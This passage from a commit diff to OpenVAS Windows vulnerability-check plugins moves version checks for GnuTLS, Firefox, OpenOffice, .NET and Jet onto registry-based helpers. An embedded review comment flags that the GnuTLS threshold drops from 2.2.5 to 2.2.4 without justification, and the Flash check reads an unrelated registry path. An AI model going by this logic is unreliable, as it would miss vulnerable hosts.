script_require_keys("SMB/WindowsVersion"); + script_require_ports(139, 445); + exit(0); +} -Solution: - All Adobe Flash Player users should upgrade to the latest version: +include("smb_nt.inc"); +include("version_func.inc"); +include("secpod_smb_func.inc"); -Risk factor : High -"; +if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); +} - script_description(desc); - summary = "Determines the Version of Flashplayer"; - script_summary(summary); - script_category(ACT_GATHER_INFO); - script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); - 
exit(0); +filePath = registry_get_sz(key:"SOFTWARE\Microsoft\COM3\Setup", + item:"Install Path"); +if(!filePath){ + exit(0); } -# -# The code starts here -# - -include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); - - sec_hole = 0; - test_version = "9.0.115.0"; - win_dir = get_windir(); - if( !isnull(win_dir) ) { - test_file[0] = win_dir+"System32\Macromed\Flash\NPSWF32.dll"; - test_file[1] = win_dir+"System32\Macromed\Flash\Flash.ocx"; - test_file[2] = win_dir+"System32\Macromed\Flash\Flash6.ocx"; - foreach filespec (test_file) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEFileVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less_equal(version: v, test_version: test_version) ) { - if( sec_hole == 0 ) { - security_hole(port:0, proto:"Win_Flashplayer"); - sec_hole = 1; - } - security_hole(port:0, proto:"Win_Flashplayer", data:"Fileversion : C$ "+filespec + " "+v+string("\n")); - } - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"Win_Flashplayer", data:report); - } - } +flashPath = filePath + "\Macromed\Flash\"; +foreach filespec (make_list("NPSWF32.dll", "Flash.ocx", "Flash6.ocx")) +{ + share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:filePath); + file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", + string:flashPath + filespec); + fileVer = GetVer(file:file, share:share); + if(fileVer) + { + if(version_is_less_equal(version:fileVer, test_version:"9.0.115.0")) + { + security_hole(0); + exit(0); } } - -exit(0); +} Modified: trunk/openvas-plugins/scripts/smbcl_gnutls_CB-A08-0079.nasl =================================================================== --- 
trunk/openvas-plugins/scripts/smbcl_gnutls_CB-A08-0079.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/smbcl_gnutls_CB-A08-0079.nasl 2009-10-05 06:51:33 UTC (rev 5361) @@ -1,3 +1,4 @@ +################################################################################ # # This script was written by Carsten Koch-Mauthe # @@ -3,19 +4,24 @@ # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 03 $ +# +# Modified to implement through 'smb_nt.inc' +#- By Nikita MR on 2009-09-17 +# +################################################################################ if(description) { script_id(90027); - script_version ("$Revision: 01 $"); + script_version ("$Revision: 03$"); script_cve_id("CVE-2008-1948"); - name = "GnuTLS < 2.2.5 vulnerability (Win)"; + name = "GnuTLS < 2.2.4 vulnerability (Win)"; script_name(name); desc = "The remote host is probably affected by the vulnerabilities described in -CVE-2008-1948, CVE-2008-1949, CVE-2008-1950 + CVE-2008-1948, CVE-2008-1949, CVE-2008-1950 -GnuTLS < 2.2.5 vulnerability +GnuTLS < 2.2.4 vulnerability Impact 
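Review bot: the plugin name in this hunk of scripts/smbcl_gnutls_CB-A08-0079.nasl changes from "GnuTLS < 2.2.5 vulnerability (Win)" to "< 2.2.4", and the description, the summary and the version check in the same file change with it, although the log message only says "Removed dependency on smbclient". With `version_is_less(version:gnutlsVer, test_version:"2.2.4")` a host running 2.2.4, which the old check with test_version "2.2.5" flagged, is no longer reported, so either justify the new threshold against the advisory in the commit message or keep 2.2.5. `script_cve_id` still lists only CVE-2008-1948 while the description also names CVE-2008-1949 and CVE-2008-1950.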
@@ -60,51 +66,25 @@ "; script_description(desc); - summary = "Determines GnuTLS < 2.2.5 vulnerability"; + summary = "Determines GnuTLS < 2.2.4 vulnerability"; script_summary(summary); script_category(ACT_GATHER_INFO); script_copyright("This script is under GPLv2"); - family = "Windows"; + family = "General"; script_family(family); + script_dependencies("gb_gnutls_detect_win.nasl"); + script_require_keys("GnuTLS/Win/Ver"); + script_require_ports(139, 445); exit(0); } -# -# The code starts here -# -include("smbcl_func.inc"); -include("version_func.inc"); -if( check_smbcl() == 0 ) exit(0); +include ("version_func.inc"); -local_var ver, test_version, sec_hole, sec_proto, r, path, share, prog; - -sec_hole = 0; -sec_proto = "GnuTLS"; -ver = NULL; -r = NULL; -test_version = "2.2.5"; - - path = "Programme\"; - share ="C$"; - prog = "GnuTLS*"; - r = smbgetdir(share: share, dir: path+prog, typ: 2 ); - if( isnull(r) ) { - path = "Program Files\"; - r = smbgetdir(share: share, dir: path+prog, typ: 2 ); +gnutlsVer = get_kb_item("GnuTLS/Win/Ver"); +if(gnutlsVer != NULL) +{ + if(version_is_less(version:gnutlsVer, test_version:"2.2.4")){ + security_hole(0); } - if( !isnull(r) ) { - foreach i (keys(r)) { - ver = eregmatch(pattern:"[0-9].*", string:r[i]); - if(!isnull(ver) ) { - if(version_is_less(version:ver[0], test_version:test_version) ) { - if(sec_hole == 0) { - security_hole(port:0, proto:sec_proto); - sec_hole = 1; - } - security_hole(port:0, proto:sec_proto, data:string("\nFound : ")+share + " " + path + r[i] + string("\n")); - } - } - } - } -exit(0); +} Modified: trunk/openvas-plugins/scripts/smbcl_mozilla.nasl =================================================================== --- trunk/openvas-plugins/scripts/smbcl_mozilla.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/smbcl_mozilla.nasl 2009-10-05 06:51:33 UTC (rev 5361) 
@@ -1,3 +1,4 @@ +################################################################################## # # This script was written by Carsten Koch-Mauthe # 
@@ -3,136 +4,99 @@ # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 03 $ +# +# Modified to implement through 'smb_nt.inc' +# - By Sharath S On 2009-09-17 +# +############################################################################### if(description) { + script_id(90013); + script_version ("$Revision: 03 $"); + script_cve_id("CVE-2008-1238", "CVE-2008-1240", "CVE-2008-1241"); + script_bugtraq_id(28448); + script_name("Mozilla Firefox, Thunderbird, Seamonkey. Several vulnerabilitys (Win)"); + desc = " + The remote host is probable affected by the vulnerabilities described in + CVE-2008-0416, CVE-2007-4879, CVE-2008-1195, CVE-2008-1233, + CVE-2008-1234, CVE-2008-1235, CVE-2008-1236, CVE-2008-1237, + CVE-2008-1238, CVE-2008-1240, CVE-2008-1241 and more. - script_id(90013); - script_version ("$Revision: 01 $"); - script_cve_id("CVE-2008-1238","CVE-2008-1240","CVE-2008-1241"); - name = "Mozilla Firefox, Thunderbird, Seamonkey. Several vulnerabilitys (Win)"; - script_name(name); + Impact: + Mozilla contributors moz_bug_r_a4, Boris Zbarsky, and Johnny Stenback reported + a series of vulnerabilities which allow scripts from page content to run with + elevated privileges. moz_bug_r_a4 demonstrated additional variants of MFSA + 2007-25 and MFSA2007-35 (arbitrary code execution through XPCNativeWrapper + pollution). Additional vulnerabilities reported separately by Boris Zbarsky, + Johnny Stenback, and moz_bug_r_a4 showed that the browser could be forced to + run JavaScript code using the wrong principal leading to universal XSS + and arbitrary code execution. - desc = "The remote host is probable affected by the vulnerabilitys described in -CVE-2008-0416, CVE-2007-4879, CVE-2008-1195, CVE-2008-1233, -CVE-2008-1234, CVE-2008-1235, CVE-2008-1236, CVE-2008-1237, -CVE-2008-1238, CVE-2008-1240, CVE-2008-1241 and more. 
+ References: + http://www.mozilla.org/security/announce/2008/mfsa2008-14.html + http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0412 + http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0416 + http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1238 + http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1240 + http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1241 + Solution: + All Users should upgrade to the latest versions of Firefox, Thunderbird or + Seamonkey. + http://www.mozilla.com/en-US/firefox/all.html + http://www.seamonkey-project.org/releases/ + http://www.mozillamessaging.com/en-US/thunderbird/all.html -Impact - Mozilla contributors moz_bug_r_a4, Boris Zbarsky, - and Johnny Stenback reported a series of vulnerabilities - which allow scripts from page content to run with elevated - privileges. moz_bug_r_a4 demonstrated additional variants - of MFSA 2007-25 and MFSA2007-35 (arbitrary code execution - through XPCNativeWrapper pollution). Additional - vulnerabilities reported separately by Boris Zbarsky, - Johnny Stenback, and moz_bug_r_a4 showed that the browser - could be forced to run JavaScript code using the wrong - principal leading to universal XSS and arbitrary code execution. - And more... + Risk factor : High"; - -References: - http://www.mozilla.org/security/announce/2008/mfsa2008-14.html - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0412 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0416 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1238 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1240 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1241 - . - . - . - -Solution: - All Users should upgrade to the latest versions of Firefox, Thunderbird or Seamonkey. - - -Risk factor : High"; - - script_description(desc); - summary = "Mozilla Firefox, Thunderbird, Seamonkey. 
Several vulnerabilitys"; - script_summary(summary); - script_category(ACT_GATHER_INFO); - script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); - exit(0); + script_description(desc); + script_summary("Mozilla Firefox, Thunderbird, Seamonkey. Several vulnerabilities"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is under GPLv2"); + script_family("General"); + script_dependencies("gb_firefox_detect_win.nasl", "gb_seamonkey_detect_win.nasl", + "gb_thunderbird_detect_win.nasl"); + script_require_keys("Firefox/Win/Ver", "Seamonkey/Win/Ver", + "Thunderbird/Win/Ver"); + script_require_ports(139, 445); + exit(0); } -# -# The code starts here -# +include("smb_nt.inc"); include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); - test_version = "2.0.0.14"; # Test Firefox - test_file[0] = "Programme\Mozilla Firefox\firefox.exe"; - test_file[1] = "Prog Files\Mozilla Firefox\firefox.exe"; - foreach filespec (test_file) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEProductVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - security_hole(port:0, proto:"Win_Mozilla"); - report = report + "Fileversion : C$ "+filespec + " "+v+string("\n"); - security_hole(port:0, proto:"Win_Mozilla", data:report); - } - break; - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"Win_Mozilla", data:report); - } - } +# Firefox Check +ffVer = get_kb_item("Firefox/Win/Ver"); +if(ffVer) +{ + # Grep for Firefox version < 2.0.0.14 + if(version_is_less(version:ffVer, test_version:"2.0.0.14")) + { + security_hole(0); + exit(0); } - test_version = "2.0.0.14"; # Test 
Thunderbird - test_file[0] = "Programme\Mozilla Thunderbird\thunderbird.exe"; - test_file[1] = "Prog Files\Mozilla Thunderbird\thunderbird.exe"; - foreach filespec (test_file) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEProductVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - security_hole(port:0, proto:"Win_Mozilla"); - report = report + "Fileversion : C$ "+filespec + " "+v+string("\n"); - security_hole(port:0, proto:"Win_Mozilla", data:report); - } - break; - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"Win_Mozilla", data:report); - } - } +} + +# Seamonkey Check +smVer = get_kb_item("Seamonkey/Win/Ver"); +if(smVer) +{ + # Grep for Seamonkey version < 1.1.9 + if(version_is_less(version:smVer, test_version:"1.1.9")) + { + security_hole(0); + exit(0); } - test_version = "1.1.9"; # Test SeaMonkey - test_file[0] = "Programme\mozilla.org\SeaMonkey\seamonkey.exe"; - test_file[1] = "Prog Files\mozilla.org\SeaMonkey\seamonkey.exe"; - foreach filespec (test_file) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEProductVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - security_hole(port:0, proto:"Win_Mozilla"); - report = report + "Fileversion : C$ "+filespec + " "+v+string("\n"); - security_hole(port:0, proto:"Win_Mozilla", data:report); - } - break; - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - 
security_note(port:0, proto:"Win_Mozilla", data:report); - } - } - } +} -exit(0); +# Thunderbird Check +tbVer = get_kb_item("Thunderbird/Win/Ver"); +if(tbVer) +{ + # Grep for Thunderbird version < 2.0.0.14 + if(version_is_less(version:tbVer, test_version:"2.0.0.14")){ + security_hole(0); + } +} Modified: trunk/openvas-plugins/scripts/smbcl_openoffice_CB-A08-0068.nasl =================================================================== --- trunk/openvas-plugins/scripts/smbcl_openoffice_CB-A08-0068.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/smbcl_openoffice_CB-A08-0068.nasl 2009-10-05 06:51:33 UTC (rev 5361) @@ -1,3 +1,4 @@ +##################################################################################### # # This script was written by Carsten Koch-Mauthe # 
@@ -3,28 +4,29 @@ # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 03 $ +# +# Updated By Antu Sanadi on 16/09/2009 +# +# +#################################################################################### if(description) { - script_id(90030); - script_version ("$Revision: 01 $"); - script_cve_id("CVE-2008-2152"); - name = "OpenOffice.org <= 2.4.1 vulnerability (Win)"; - script_name(name); + script_id(90030); + script_version ("$Revision: 03 $"); + script_cve_id("CVE-2008-2152"); + script_bugtraq_id(29622); + script_name("OpenOffice.org <= 2.4.1 vulnerability (Win)"); + desc = "The remote host is probably affected by the vulnerabilities described in + CVE-2008-2152 or CVE-2008-3282 on 64-bit platform's - desc = "The remote host is probably affected by the vulnerabilities described in -CVE-2008-2152 or CVE-2008-3282 on 64-bit platform's - -OpenOffice.org <= 2.4.1 vulnerability - -Impact - + Impact CVE-2008-2152 Integer overflow in the rtl_allocateMemory function in sal/rtl/source/alloc_global.c in OpenOffice.org (OOo) 2.0 through 2.4 allows remote attackers to execute arbitrary code via a crafted file that triggers a - heap-based buffer overflow. + heap-based buffer overflow. CVE-2008-3282 Integer overflow in the rtl_allocateMemory function 
@@ -34,78 +36,34 @@ remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted document, related to a 'numeric truncation error,' a - different vulnerability than CVE-2008-2152. - -References: + different vulnerability than CVE-2008-2152. + + References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2152 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3282 -Solution: + Solution: All OpenOffice.org users should upgrade to the latest version: + Risk factor : High"; -Risk factor : High -"; - - script_description(desc); - summary = "Determines OpenOffice.org <= 2.4.1 vulnerability"; - script_summary(summary); - script_category(ACT_GATHER_INFO); - script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); - exit(0); + script_description(desc); + script_summary("Check for the version of OpenOffice"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is under GPLv2"); + script_family("Buffer overflow"); + script_dependencies("secpod_openoffice_detect_win.nasl"); + script_require_keys("OpenOffice/Win/Ver"); + exit(0); } -# -# The code starts here -# + include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); -sec_hole = 0; -sec_proto = "OpenOffice.org"; -test_version = "2.4.9310"; -ver = NULL; -r = NULL; - - sec_hole = 0; - path = "Programme\"; - share ="C$"; - prog = "OpenOffice.org*"; - r = smbgetdir(share: share, dir: path+prog, typ: 2 ); - if( isnull(r) ) { - path = "Program Files\"; - r = smbgetdir(share: share, dir: path+prog, typ: 2 ); +openVer = get_kb_item("OpenOffice/Win/Ver"); +if(openVer != NULL) +{ + if(version_is_less_equal(version:openVer, test_version:"2.4.1")){ + security_hole(0); } - if( !isnull(r) ) { - foreach oodir (r) { - file_spec = path+oodir+"\program\version.ini"; - r = smbgetdir(share: "C$", dir: file_spec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = 
get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: file_spec, tmp_filename: tmp_filename) ) { - ver = fread(tmp_filename); - unlink(tmp_filename); - if( ! isnull(ver) ) { - version = ereg_replace(pattern:".+OOOBaseVersion=", string: ver, replace: "")+"."; - version = eregmatch(pattern:"([0-9]\.)+[0-9]+", string: version); - build = ereg_replace(pattern:".+ProductBuildid=", string: ver, replace: ""); - build = eregmatch(pattern:"^[0-9]+", string: build); - ver = version[0]+"."+build[0]; - set_kb_item(name: "OpenOffice.org/Build", value: ver); - if( version_is_less(version:ver, test_version:test_version) ) { - if(sec_hole == 0) { - security_warning(port:0, proto:sec_proto); - sec_hole = 1; - } - security_warning(port:0, proto:sec_proto, data:string("\nFound : ") + oodir + - " Build : " + ver + string("\n")); - } - } - } - } - } - } -exit(0); +} Modified: trunk/openvas-plugins/scripts/win_CVE-2007-0043.nasl =================================================================== --- trunk/openvas-plugins/scripts/win_CVE-2007-0043.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/win_CVE-2007-0043.nasl 2009-10-05 06:51:33 UTC (rev 5361) 
@@ -1,90 +1,98 @@ +################################################################################# # +# # This script was written by Carsten Koch-Mauthe # # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 02 $ +# Updated by: +# Antu Sanadi on 16/09/22 +# +############################################################################### if(description) { + script_id(90010); + script_version ("$Revision: 02 $"); + script_cve_id("CVE-2007-0043"); + script_bugtraq_id(24811); + script_name(".NET JIT Compiler Vulnerability"); + desc = "The remote host is affected by the vulnerabilitys described in + CVE-2007-0043 - script_id(90010); - script_version ("$Revision: 01 $"); - script_cve_id("CVE-2007-0043"); - name = ".NET JIT Compiler Vulnerability"; - script_name(name); + Checking if System.web.dll version is less than 2.0.50727.832 - desc = "The remote host is affected by the vulnerabilitys described in -CVE-2007-0043 + Impact: + The Just In Time (JIT) Compiler service in Microsoft .NET Framework 1.0, 1.1, + and 2.0 for Windows 2000, XP, Server 2003, and Vista allows user-assisted + remote attackers to execute arbitrary code via unspecified vectors involving + an unchecked buffer, probably a buffer overflow, aka .NET JIT Compiler + Vulnerability. Checking if System.web.dll version is less than 2.0.50727.832 -Checking if System.web.dll version is less than 2.0.50727.832 + References: + http://secunia.com/advisories/26003 + http://securitytracker.com/alerts/2007/Jul/1018356.html + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0043 + http://www.microsoft.com/technet/security/Bulletin/ms07-040.mspx -Impact - The Just In Time (JIT) Compiler service in Microsoft - .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, - Server 2003, and Vista allows user-assisted remote - attackers to execute arbitrary code via unspecified - vectors involving an unchecked buffer, probably a - buffer overflow, aka .NET JIT Compiler Vulnerability. 
- Checking if System.web.dll version is less than 2.0.50727.832 + Solution: + All Users should upgrade to the latest version. + http://www.microsoft.com/technet/security/Bulletin/ms07-040.mspx -References: - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0043 + Risk factor : High"; -Solution: - All Users should upgrade to the latest version. + script_description(desc); + script_summary("Test for .NET JIT Compiler Vulnerability"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is under GPLv2"); + script_family("Windows : Microsoft Bulletins"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_keys("SMB/WindowsVersion"); + script_require_ports(139, 445); + exit(0); +} -Risk factor : High"; +include("smb_nt.inc"); +include("secpod_reg.inc"); +include("version_func.inc"); +include("secpod_smb_func.inc"); - script_description(desc); - summary = "Test for .NET JIT Compiler Vulnerability"; - script_summary(summary); - script_category(ACT_GATHER_INFO); - script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); - script_require_ports(139, 445); - exit(0); +if(hotfix_check_sp(xp:4, win2k:5, win2003:3) <= 0){ + exit(0); } -# -# The code starts here -# +key = "SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDlls\"; +foreach item (registry_enum_values(key:key)) +{ + if("System.Web.dll" >< item) + { + path = item; + break; + } +} -include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); +if(!path){ + exit(0); +} - test_version = "2.0.50727.832"; - win_dir = get_windir(); - if( !isnull(win_dir) ) { - path = win_dir+"Microsoft.NET\Framework\"; - filespec = "v2*"; - r = smbgetdir(share: "C$", dir: path+filespec, typ: 2 ); - if( !isnull(r) ) { - filespec = r[0]+"\"+"system.web.dll"; - r = smbgetdir(share: "C$", dir: path+filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - orig_filename = path+filespec; - if( smbgetfile(share: 
"C$", filename: orig_filename, tmp_filename: tmp_filename) ) { - v = GetPEFileVersion(tmp_filename:tmp_filename, orig_filename:orig_filename); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - security_hole(port:0, proto:"SMB"); - report = report + "Fileversion : C$ "+orig_filename + " "+v+string("\n"); - security_hole(port:0, proto:"SMB", data:report); - } - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } - } else { - report = string(".NET V2xx not found/no access -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } +if("c:" >< path){ + path = ereg_replace(pattern:"c:", replace:"C:", string:path); +} -exit(0); +share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:path); +file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:path); +dllVer = GetVer(file:file, share:share); + +if(!dllVer){ + exit(0); +} + +# Check for .Net Framework version 1.0 < 1.0.3705.6060, 1.1 < 1.1.4322.2407 +# and 2.0 < 2.0.50727.832 +if(version_in_range(version:dllVer, test_version:"1.0", test_version2:"1.0.3705.6059")|| + version_in_range(version:dllVer, test_version:"1.1", test_version2:"1.1.4322.2406")|| + version_in_range(version:dllVer, test_version:"2.0", test_version2:"2.0.50727.831")){ + security_hole(0); +} Modified: trunk/openvas-plugins/scripts/win_CVE-2007-6026.nasl =================================================================== --- trunk/openvas-plugins/scripts/win_CVE-2007-6026.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/win_CVE-2007-6026.nasl 2009-10-05 06:51:33 UTC (rev 5361) @@ -1,3 +1,4 @@ +################################################################################## # # This script was written by Carsten Koch-Mauthe # 
@@ -3,137 +4,114 @@ # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 03 $ +# +# Updated By: +# Antu Sanadi on 16/09/2009 +# +# +################################################################################## if(description) { + script_id(90024); + script_version ("$Revision: 03 $"); + script_cve_id("CVE-2007-6026"); + script_bugtraq_id(28398); + script_name("Windows Vulnerability in Microsoft Jet Database Engine"); + desc = "The remote host is probably affected by the vulnerability described in + CVE-2007-6026 - script_id(90024); - script_version ("$Revision: 01 $"); - script_cve_id("CVE-2007-6026"); - name = "Windows Vulnerability in Microsoft Jet Database Engine"; - script_name(name); - - desc = "The remote host is probably affected by the vulnerability described in -CVE-2007-6026 - - -Impact + Impact Stack-based buffer overflow in Microsoft msjet40.dll 4.0.8618.0 (aka Microsoft Jet Engine), as used by Access 2003 in Microsoft Office 2003 SP3, allows user-assisted attackers to execute arbitrary code via a crafted MDB file database file containing a column structure with a modified column count. NOTE: this might be the - same issue as CVE-2005-0944. + same issue as CVE-2005-0944. -References: + References: + http://www.us-cert.gov/cas/techalerts/TA08-134A.html + http://securitytracker.com/alerts/2007/Nov/1018976.html http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6026 http://www.microsoft.com/technet/security/bulletin/ms08-028.mspx -Solution: + Solution: All Users should upgrade to the latest version. 
+ Risk factor : High"; -Risk factor : High"; + script_description(desc); + script_summary("Windows Vulnerability in Microsoft Jet Database Engine"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is under GPLv2"); + script_family("Windows : Microsoft Bulletins"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_keys("SMB/WindowsVersion"); + script_require_ports(139, 445); + exit(0); +} - script_description(desc); - summary = "Windows Vulnerability in Microsoft Jet Database Engine"; - script_summary(summary); - script_category(ACT_GATHER_INFO); - script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); - script_require_ports(139, 445); - exit(0); + +include("smb_nt.inc"); +include("secpod_reg.inc"); +include("version_func.inc"); +include("secpod_smb_func.inc"); + +if(hotfix_check_sp(xp:4, win2k:5, win2003:3) <= 0){ + exit(0); } -# -# The code starts here -# +if((hotfix_missing(name:"950749") == 0)){ + exit(0); +} -local_var os; +dllPath = registry_get_sz(key:"SOFTWARE\Microsoft\COM3\Setup", + item:"Install Path"); +if(!dllPath){ + exit(0); +} -include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); +share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:dllPath); +file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:dllPath + "\Msjet40.dll"); - win_dir = get_windir(); - sec_hole = 0; - if( !isnull(win_dir) ) { - os = get_kb_item("SMB/OS"); - filespec = win_dir+"system32\Msjint40.dll"; - test_version = NULL; - if( "WINDOWS 5.1" >< os ) { - test_version = "4.0.9502.0"; - } else { - if( "WINDOWS SERVER 2003" >< os ) { - test_version = "4.0.9502.0"; - } else { - if( "WINDOWS 5.0" >< os ) { - test_version = "4.0.9502.0"; - } - } +dllVer = GetVer(file:file, share:share); +if(!dllVer){ + exit(0); +} + +# Windows 2K +if(hotfix_check_sp(win2k:5) > 0) +{ + # Grep for Msjet40.dll version < 4.0.9511.0 + if(version_is_less(version:dllVer, 
test_version:"4.0.9511.0")){ + security_hole(0); + } +} + +# Windows XP +else if(hotfix_check_sp(xp:3) > 0) +{ + SP = get_kb_item("SMB/WinXP/ServicePack"); + if("Service Pack 2" >< SP) + { + # Grep for Msjet40.dll < 4.0.9511.0 + if(version_is_less(version:dllVer, test_version:"4.0.9511.0")){ + security_hole(0); } - if( !isnull(test_version) ) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEFileVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - if( sec_hole == 0 ) { - security_hole(port:0, proto:"Win"); - sec_hole = 1; - } - security_hole(port:0, proto:"Win", data:"Version found : C$ "+filespec + " "+v+string("\n")+ - "Version expected : "+test_version+" or higher "+string("\n")); - } - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } else { - report = string(filespec+" not found/no access -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } - filespec = win_dir+"system32\Msjet40.dll"; - test_version = NULL; - if( "WINDOWS 5.1" >< os ) { - test_version = "4.0.9511.0"; - } else { - if( "WINDOWS SERVER 2003" >< os ) { - test_version = "4.0.9511.0"; - } else { - if( "WINDOWS 5.0" >< os ) { - test_version = "4.0.9511.0"; - } - } - } - if( !isnull(test_version) ) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEFileVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - if( sec_hole == 
0 ) { - security_hole(port:0, proto:"Win"); - sec_hole = 1; - } - security_hole(port:0, proto:"Win", data:"Version found : C$ "+filespec + " "+v+string("\n")+ - "Version expected : "+test_version+" or higher "+string("\n")); - } - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } else { - report = string(filespec+" not found/no access -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } } + else + security_hole(0); +} -exit(0); +# Windows 2003 +else if(hotfix_check_sp(win2003:2) > 0) +{ + SP = get_kb_item("SMB/Win2003/ServicePack"); + if("Service Pack 1" >< SP) + { + # Grep for Msjet40.dll version < 4.0.9511.0 + if(version_is_less(version:dllVer, test_version:"4.0.9511.0")){ + security_hole(0); + } + } +} Modified: trunk/openvas-plugins/scripts/win_CVE-2008-0080.nasl =================================================================== --- trunk/openvas-plugins/scripts/win_CVE-2008-0080.nasl 